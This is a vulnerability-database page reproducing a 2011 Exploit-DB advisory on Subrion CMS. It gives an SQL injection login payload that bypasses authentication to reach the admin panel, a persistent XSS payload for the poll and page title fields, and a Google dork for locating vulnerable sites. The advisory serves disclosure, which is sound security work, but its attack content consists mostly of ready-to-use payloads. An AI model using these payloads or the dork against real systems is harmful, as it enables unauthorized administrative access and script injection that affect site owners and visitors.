Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SUBRION CMS - Multiple Vulnerabilities

🗓️ 11 Jun 2011 00:00:00Reported by Karthik RType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 41 Views

Subrion CMS multiple vulnerabilities including SQL Injection and Persistent XSS

Code
1.SUBRION CMS multiple vulnerabilties
  vendor: www.subrion.com
  Author: Karthik R (3psil0nLambDa)
  Email:  [email protected]
  My blog: epsilonlambda.co.cc
  Google dork:  © 2011 Powered by Subrion CMS 

------------------------------------------------------------------------------------------------------------------------------------------------------------

Description about the CMS

  Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrion's highly scalable set of key features makes it a powerful   
  platform for web sites.
  Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with     other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be     able to invest in this system and continue to grow it to any possible level.

------------------------------------------------------------------------------------------------------------------------------------------------------------
* SQLi  Vulnerability

The attackers can use the authentication bypass to get in to the admin panel in the site. 

Exploit: Username: ' or 0=0 #
	 Password: ' or 0=0 #

* Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS in the title field.

Exploit: "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>


* Products like: Auto Classifieds, Articles Script, Auto Classifieds, Real estate script, Web directory run on the same CMS, and hence are vulnerable too.

------------------------------------------------------------------------------------------------------------------------------------------------------------

Thanks to side-effects for his valuable guidance and greets to taashu for her love and support.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Jun 2011 00:00Current
7.4High risk
Vulners AI Score7.4
subrion cmssql injectionpersistent xssauthentication bypassadmin panelpoll modulemanage pagesauto classifiedsarticles scriptreal estate scriptweb directoryvendorauthoremailvulnerabilitiessecurity
41